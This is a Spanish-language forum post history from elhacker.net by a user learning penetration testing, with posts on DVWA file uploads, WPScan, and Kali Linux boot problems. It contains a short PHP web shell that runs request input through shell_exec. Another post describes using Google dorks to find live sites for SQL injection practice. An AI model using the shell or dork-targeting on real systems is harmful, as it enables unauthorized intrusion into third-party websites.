elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Hacking / Re: como encontrar sitios con wordpress ? en: 23 Noviembre 2017, 02:48 am
 ;D Gracias DLV ..por la ayuda ...
2  Seguridad Informática / Bugs y Exploits / Re: como explotar vulnerabilidades ??? (ayuda) en: 12 Noviembre 2017, 15:46 pm
 ;D gracias mbc ...leerè el link  me dejaste .
3  Seguridad Informática / Hacking / Re: Reportar una vulnerabilidad en: 2 Noviembre 2017, 01:36 am
 ;D si vas a enviar alguna lista por email ... borrale los metadatos  ;D ... El comun de las personas piensan que todos los que nos interesamos por la seguridad informatica somos malechores que queremos romper o explotar un sitio web.
 :silbar: suerte ...
4  Seguridad Informática / Hacking / como encontrar sitios con wordpress ? en: 2 Noviembre 2017, 01:29 am
 ;D hola a todos.
Cuando estudiaba SQL injection , utilizaba " inurl info.php?id= " en google para dar con sitios web y poder practicar .
Ahora estoy estudiando con WPscan y necesito saber que inurl debo utilizar para encontrar pàginas realizadas con worpress.
Gracias y saludos . ;-)
5  Seguridad Informática / Hacking / Re: necesito una shell.php.jpg en: 28 Octubre 2017, 00:00 am
 ;D hola engel lex ...gracias por ayudarme..
segui los pasos pero no funciona ... al direijirme a "http://localhost/dvwa/hackable/uploads/Archivo.jpg"  me da un pantallazo negro  >:( .



este còdigo es de mi pequeña shell , pero cuando le pongo extension jpg tampoco funciona ..shell.php.jpg solo funciona como shell.php

Código:
<?php 
    echo "
<pre>";
    echo shell_exec(@$_REQUEST["g"]);
    echo "</pre>
";
?>

igual que el còdigo que me sediste solo funciona con extensiòn php

Código:
<?php echo "mi shell, esta pagina fue penetrada"; ?> 

 :( :( :(
6  Seguridad Informática / Hacking / necesito una shell.php.jpg en: 27 Octubre 2017, 17:21 pm
 ;D hola a todos.
Estoy practicando con DVWA y necesito subir una shell con extenciòn jpg . Por mas q he buscado en google no encuentro una que funcione ..
Si me pueden ayudar gracias  ;-)
7  Sistemas Operativos / GNU/Linux / Re: kali linux se volviò loco en: 21 Octubre 2017, 02:23 am
 ;D Gracias engel lex por el consejo ...o harè asì como dices... serà mejor y mas estable  ;-)
8  Sistemas Operativos / GNU/Linux / Re: kali linux se volviò loco en: 21 Octubre 2017, 02:01 am
es verdad engel lex ...
-que te parece si instalo una distro estable basada en debian y a esa distro le agrego las herramientas de pentesting ???
Escucho consejos ...
9  Sistemas Operativos / GNU/Linux / Re: kali linux se volviò loco en: 20 Octubre 2017, 19:26 pm
Gracias engel lex ...
Tienes razòn ..se ha vuelto muy inestable desde q pasò a ser kali linux .
que deshabilita o habilita el modo failsafe para que no tenga problemas de video ?
-Se me ocurre que si puedo agregar alguna linea de còdigo para qque quede failsafe  activado , podre ingresar sin problema de video ...
sino intentar con otra disribuciòn pentesting .
10  Sistemas Operativos / GNU/Linux / kali linux se volviò loco en: 20 Octubre 2017, 17:44 pm
 ;D hola amigos.
He tenido backtrack 3 , 4 y 5 sin ningùn problema pero ahora con kali linux tengo algunos problemas  :P
Cuando inicio kali linux en forma live , me sale el menù de una forma extraña y parpadea el monitor .
(foto de errores )



Pero cundo inicio en modo FAILSAFE ...pues inicia y funciona correctamente



Por que se da esto ?
Gracias x la ayuda  .
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines